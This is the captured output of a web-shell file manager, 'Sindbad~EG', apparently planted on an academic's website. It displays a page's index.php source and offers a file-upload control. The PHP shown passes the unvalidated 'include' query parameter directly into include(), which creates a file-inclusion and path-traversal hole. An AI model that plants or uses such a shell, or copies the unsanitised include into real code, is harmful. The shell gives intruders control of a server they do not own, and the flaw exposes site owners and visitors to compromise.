Sindbad~EG File Manager

Current Path : /usr/home/beeson/public_html/michaelbeeson/research/FoundationsOfGeometry/
Upload File :
Current File : /usr/home/beeson/public_html/michaelbeeson/research/FoundationsOfGeometry/index.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- DW6 -->
<?php include ('include/head.php'); ?>
<body onmousemove="closesubnav(event);"> 
<?php include ('include/body.php'); ?>
  <div class="style1" id="pageName">   
      <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="94%" id="AutoNumber1">
        <tr>
          <td width="100%">  
			<?php 
                $include = $_GET['include'];
				if ( $include=="" )
					{ include ("include/index.html");
					}
				else
					{ include ("include/".$include.".html");
					}
				?>
          <p align="left"></td>
        </tr>
      </table>
  </div>
</div>   
<?php include ('include/footer.php'); ?>
</body>
</html>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists